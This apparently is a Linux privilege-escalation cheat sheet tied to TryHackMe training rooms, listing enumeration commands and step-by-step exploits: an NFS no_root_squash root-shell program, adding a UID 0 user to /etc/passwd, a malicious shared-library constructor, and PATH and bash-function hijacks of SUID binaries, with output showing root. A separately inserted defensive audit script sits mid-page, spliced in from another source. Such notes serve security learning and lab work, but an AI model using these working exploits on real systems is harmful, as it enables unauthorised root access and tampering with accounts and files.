
Linux Privilege Escalation

PrivEsc: Exploits

  1. Identify the kernel version
  2. Search for exploit code matching the kernel version of the target system
  3. Run the exploit

PrivEsc: Sudo

  1. sudo -l
  2. https://gtfobins.github.io/
  3. Leverage LD_PRELOAD
  4. User can run a script as another user: sudo -u <user-name> /opt/script/script.sh

PrivEsc: SUID

If the SUID bit is set, the binary runs with the permissions of the file owner; check https://gtfobins.github.io/

find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

PrivEsc: Capabilities

  1. run getcap -r / 2>/dev/null
  2. check https://gtfobins.github.io/

PrivEsc: LD_PRELOAD

  • sudo -l
  • http://michalszalkowski.com/security/linux/leverage-ld-preload/

PrivEsc: Cron

  • cat /etc/crontab
  • cat /etc/cron*
  • Types of exploits that can be used
    • Check the permissions of the script that is executed; if you can overwrite it, you win
    • Check the path to the script that is executed; if you can update PATH, you win

PrivEsc: PATH

  1. What folders are located under $PATH
  2. Does your current user have write privileges for any of these folders?
  3. Can you modify $PATH?
  4. Is there a script/application you can start that will be affected by this vulnerability?
    echo $PATH
    find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
    find / -writable 2>/dev/null | grep 'home'
    export PATH=/tmp:$PATH
    

PrivEsc: NFS

  1. Run cat /etc/exports
  2. Check whether any share has the no_root_squash option
  3. If so, mount that share
    mkdir -p /tmp/nfs_hacked
    sudo mount -t nfs <target-ip>:/home /tmp/nfs_hacked
    sudo umount /tmp/nfs_hacked   # when finished
    
  4. Create an nfs.c file in that share
    #include <stdlib.h>
    #include <unistd.h>

    int main()
    {
       setgid(0);
       setuid(0);
       system("/bin/bash");
       return 0;
    }
    
  5. Compile as root so the resulting binary is owned by root
    sudo su
    gcc nfs.c -o nfs -w
    chmod +s nfs
    
  6. Go to the target machine and execute the nfs binary from the mounted share
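
A defensive counterpart to the NFS, PATH and cron sections above, added here and not part of the original page: a POSIX sh audit script that flags the misconfigurations those steps rely on (exports with no_root_squash, world-writable or relative PATH entries, and crontab commands that are world-writable or resolved through PATH). The function names, output format and `--run` flag are my own choices.

```shell
#!/bin/sh
# Defensive audit of the misconfigurations the NFS, PATH and cron sections
# rely on. Constructed example, not from the original page. File paths are
# parameters so the checks run against sample files as well as a live host.

# Print exported directories whose options contain no_root_squash.
# Usage: exports_with_no_root_squash /etc/exports
exports_with_no_root_squash() {
  grep -v '^[[:space:]]*#' "$1" | awk 'NF && /no_root_squash/ { print $1 }'
}

# Print PATH entries that are empty or relative (resolved from the current
# directory) or world-writable; a binary planted there shadows the real one.
# Usage: risky_path_dirs "$PATH"
risky_path_dirs() {
  printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
    case "$d" in
      ""|[!/]*) echo "relative:${d:-<empty>}" ;;
      *) if [ -n "$(find "$d" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
           echo "world-writable:$d"
         fi ;;
    esac
  done
}

# Print crontab commands that are world-writable files or bare names looked
# up through PATH. Handles /etc/crontab lines (5 time fields, user, command)
# and @reboot-style lines (keyword, user, command).
# Usage: risky_cron_commands /etc/crontab
risky_cron_commands() {
  grep -v '^[[:space:]]*#' "$1" |
    awk '$1 ~ /^@/ && NF >= 3 { print $3 }
         $1 !~ /^@/ && NF >= 7 { print $7 }' |
    while IFS= read -r cmd; do
      case "$cmd" in
        /*) if [ -n "$(find "$cmd" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
              echo "world-writable:$cmd"
            fi ;;
        *)  echo "path-relative:$cmd" ;;
      esac
    done
}

# Run all checks against the live host: sh privesc_audit.sh --run
audit_host() {
  exports_with_no_root_squash /etc/exports 2>/dev/null
  risky_path_dirs "$PATH"
  risky_cron_commands /etc/crontab 2>/dev/null
}
if [ "${1:-}" = "--run" ]; then audit_host; fi
```

Any line it prints is a finding to fix (drop no_root_squash, remove the PATH entry, tighten the file mode or use an absolute path in the crontab), and the same checks can be scheduled or fed into host monitoring.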

PrivEsc: Writable files

/etc/passwd

Generate a password hash with one of the following commands:

openssl passwd -1 -salt hacker hacker
# mkpasswd -m SHA-512 hacker
# python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

Add a user hacker with UID 0 to /etc/passwd (the second line shows an MD5-crypt hash with salt hacker, as produced by the openssl command above):

echo 'hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd

PrivEsc: Hijack shared library

Find all binaries with the SUID bit set:

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-s

For each interesting finding, trace the files it tries to open with strace:

strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
#-> open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
#-> open("/lib/libc.so.6", O_RDONLY)        = 3
#-> open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)

As the output shows, the shared library libcalc.so is missing from /home/user/.config/. Recreate the missing libcalc.so:

echo '#include <stdio.h>' > libcalc.c
echo '#include <stdlib.h>' >> libcalc.c
echo '' >> libcalc.c
echo 'static void inject() __attribute__((constructor));' >> libcalc.c
echo '' >> libcalc.c
echo 'void inject() {' >> libcalc.c
echo '    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");' >> libcalc.c
echo '}' >> libcalc.c

Compile it into the location the binary expects:

gcc -shared -o /home/user/.config/libcalc.so -fPIC libcalc.c

Execute the SUID binary:

/usr/local/bin/suid-so
whoami
#-> root

PrivEsc: Hijack service

Find all binaries with the SUID bit set:

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env

For each interesting finding, list the printable strings it contains:

strings /usr/local/bin/suid-env
#-> fffff.
#-> l$ L
#-> t$(L
#-> |$0H
#-> service apache2 start     <- -------------------------- TARGET

The binary calls service without an absolute path. Create a malicious service binary:

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
cd /tmp
gcc /tmp/service.c -o /tmp/service

Update PATH so /tmp is searched first:

export PATH=/tmp:$PATH

Execute the SUID binary:

/usr/local/bin/suid-env
whoami
#-> root

PrivEsc: Hijack service path

Find all binaries with the SUID bit set:

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816764 8 -rwsr-sr-x 1 root staff 6899 May 14  2017 /usr/local/bin/suid-env2

For each interesting finding, list the printable strings it contains:

strings /usr/local/bin/suid-env2
#-> l$ L
#-> t$(L
#-> |$0H
#-> /usr/sbin/service apache2 start <- --------------------- TARGET

Here the path is absolute, so PATH cannot be used; instead, create a malicious bash function named after that path and export it:

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service

Execute the SUID binary:

/usr/local/bin/suid-env2
whoami
#-> root

  • https://tryhackme.com/room/linprivesc
  • https://tryhackme.com/room/linuxprivescarena